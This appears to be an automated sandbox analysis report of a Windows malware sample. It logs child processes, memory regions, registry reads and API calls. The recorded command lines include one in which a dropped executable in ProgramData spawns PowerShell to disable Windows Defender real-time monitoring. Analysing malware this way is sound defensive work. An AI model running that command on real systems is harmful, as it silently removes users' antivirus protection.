Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Environment Get Environment String name = PROMPT False 1
Environment Set Environment String name = PROMPT, value = $P$G True 1
Environment Get Environment String - True 1
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Environment Get Environment String name = KEYS False 1
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Environment Get Environment String - True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75fe3b92 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Environment Set Environment String name = COPYCMD True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCode, value = 00000005 True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCodeAscii True 1
Environment Get Environment String - True 1
File Open filename = STD_OUTPUT_HANDLE True 2
File Open filename = STD_INPUT_HANDLE True 1
Process #17: cmd.exe
Information Value
ID #17
File Name c:\windows\syswow64\cmd.exe
Command Line /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
Information Value
PID 0x648
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x250
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x0062ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000630000 0x00630000 0x007b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000820000 0x00820000 0x0091ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000920000 0x00920000 0x00aa0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ab0000 0x00ab0000 0x01eaffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001eb0000 0x01eb0000 0x021f2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x250
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1 Fn
System Get Time type = Ticks, time = 269086 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a680000 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75fda84f True 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1 Fn
File Open filename = STD_OUTPUT_HANDLE True 3 Fn
File Open filename = STD_INPUT_HANDLE True 2 Fn
Environment Get Environment String - True 2 Fn Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1 Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1 Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1 Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1 Fn
Environment Get Environment String name = PROMPT False 1 Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1 Fn
Environment Get Environment String - True 1 Fn Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1 Fn
Environment Get Environment String name = KEYS False 1 Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1 Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1 Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1 Fn
Environment Get Environment String - True 1 Fn Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75fe3b92 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1 Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1 Fn
Environment Set Environment String name = COPYCMD True 1 Fn
Environment Get Environment String - True 1 Fn Data
Environment Set Environment String name = =ExitCode, value = 00000001 True 1 Fn
Environment Get Environment String - True 1 Fn Data
Environment Set Environment String name = =ExitCodeAscii True 1 Fn
Environment Get Environment String - True 1 Fn Data
File Open filename = STD_OUTPUT_HANDLE True 2 Fn
File Open filename = STD_INPUT_HANDLE True 1 Fn
Process #18: powershell.exe
Information Value
ID #18
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
Information Value
PID 0x914
Parent PID 0x648 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x3C4
0x748
0x9C0
0x9DC
0x9AC
0x9C4
0x4B4
0x37C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x00130000 0x00132fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x001f0000 0x001f3fff Memory Mapped File Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00200000 0x0021efff Memory Mapped File Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x00230000 0x0025ffff Memory Mapped File Readable True False False -
cversions.2.db 0x00260000 0x00263fff Memory Mapped File Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x002fffff Private Memory - True False False -
private_0x0000000000300000 0x00300000 0x0030ffff Private Memory - True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
private_0x0000000000350000 0x00350000 0x003cffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x003d0000 0x00435fff Memory Mapped File Readable True False False -
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory - True False False -
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory - True False False -
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory - True False False -
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory - True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory Readable, Writable, Executable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
l_intl.nls 0x004d0000 0x004d2fff Memory Mapped File Readable False False False -
private_0x00000000004e0000 0x004e0000 0x004e0fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x004f0000 0x004f4fff Memory Mapped File Readable False False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
microsoft.wsman.runtime.dll 0x00540000 0x00547fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d70000 0x01d70000 0x01e4efff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e50000 0x01e50000 0x01e50fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e80000 0x01e80000 0x01ebffff Private Memory Readable, Writable True False False -
private_0x0000000001ed0000 0x01ed0000 0x01f0ffff Private Memory Readable, Writable True False False -
private_0x0000000001f10000 0x01f10000 0x01f4ffff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x01f5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002070000 0x02070000 0x020affff Private Memory Readable, Writable True False False -
sortkey.nlp 0x020b0000 0x020f0fff Memory Mapped File Readable False False False -
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False -
private_0x0000000002150000 0x02150000 0x0218ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02190000 0x0245efff Memory Mapped File Readable False False False -
pagefile_0x0000000002460000 0x02460000 0x02852fff Pagefile Backed Memory Readable True False False -
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False -
system.transactions.dll 0x028d0000 0x0290ffff Memory Mapped File Readable False False False -
private_0x0000000002910000 0x02910000 0x0294ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002950000 0x02950000 0x029effff Private Memory Readable, Writable True False False -
private_0x0000000002a70000 0x02a70000 0x02a7ffff Private Memory Readable, Writable True False False -
private_0x0000000002a80000 0x02a80000 0x04a7ffff Private Memory Readable, Writable True False False -
private_0x0000000004aa0000 0x04aa0000 0x04adffff Private Memory Readable, Writable True False False -
system.management.automation.dll 0x04ae0000 0x04dc1fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll.mui 0x04dd0000 0x04e8ffff Memory Mapped File Readable, Writable False False False -
powershell.exe 0x21d50000 0x21dc1fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
system.management.automation.ni.dll 0x71f20000 0x72799fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.dll 0x727a0000 0x72a81fff Memory Mapped File Readable, Writable, Executable False False False -
system.ni.dll 0x72a90000 0x7322bfff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x73230000 0x73d27fff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x73d30000 0x742dafff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
system.core.ni.dll 0x74400000 0x74634fff Memory Mapped File Readable, Writable, Executable True False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
system.transactions.ni.dll 0x74680000 0x7471bfff Memory Mapped File Readable, Writable, Executable True False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x747a0000 0x747eafff Memory Mapped File Readable, Writable, Executable True False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.consolehost.ni.dll 0x749a0000 0x74a20fff Memory Mapped File Readable, Writable, Executable True False False -
msvcr80.dll 0x74a80000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x74b20000 0x74b99fff Memory Mapped File Readable, Writable, Executable True False False -
ntshrui.dll 0x74ba0000 0x74c0ffff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.wsman.management.ni.dll 0x75020000 0x750a4fff Memory Mapped File Readable, Writable, Executable True False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x75340000 0x7534afff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x75360000 0x75369fff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x75370000 0x75388fff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x75390000 0x75398fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x753a0000 0x753ebfff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x75430000 0x7545dfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x75460000 0x75554fff Memory Mapped File Readable, Writable, Executable False False False -
mscoree.dll 0x75560000 0x755a9fff Memory Mapped File Readable, Writable, Executable True False False -
atl.dll 0x755b0000 0x755c3fff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.wsman.runtime.dll 0x755e0000 0x755e7fff Memory Mapped File Readable, Writable, Executable False False False -
system.configuration.install.ni.dll 0x755f0000 0x75614fff Memory Mapped File Readable, Writable, Executable True False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 50 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x3c4
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 3 Fn
File Get Info filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1 Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1 Fn
Module Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1 Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1 Fn
Environment Get Environment String name = MshEnableTrace False 3 Fn
File Get Info filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1 Fn
Environment Get Environment String name = MshEnableTrace False 2 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1 Fn
Environment Get Environment String name = MshEnableTrace False 9 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
System Get Info type = Operating System True 1 Fn
Environment Get Environment String name = MshEnableTrace False 1 Fn
Environment Get Environment String name = MshEnableTrace False 1 Fn
Environment Get Environment String name = MshEnableTrace False 1 Fn
Environment Get Environment String name = HOMEDRIVE, result_out = C: True 1 Fn
Environment Get Environment String name = HOMEPATH, result_out = \Users\kFT6uTQW True 1 Fn
File Get Info filename = C:\Users\kFT6uTQW, type = file_attributes True 1 Fn
File Get Info filename = C:\, type = file_attributes True 4 Fn
Environment Get Environment String name = MshEnableTrace False 1 Fn
Environment Get Environment String name = MshEnableTrace False 1 Fn
Environment Get Environment String name = MshEnableTrace False 2 Fn
Environment Get Environment String name = HomeDrive, result_out = C: True 1 Fn
Environment Get Environment String name = HomePath, result_out = \Users\kFT6uTQW True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
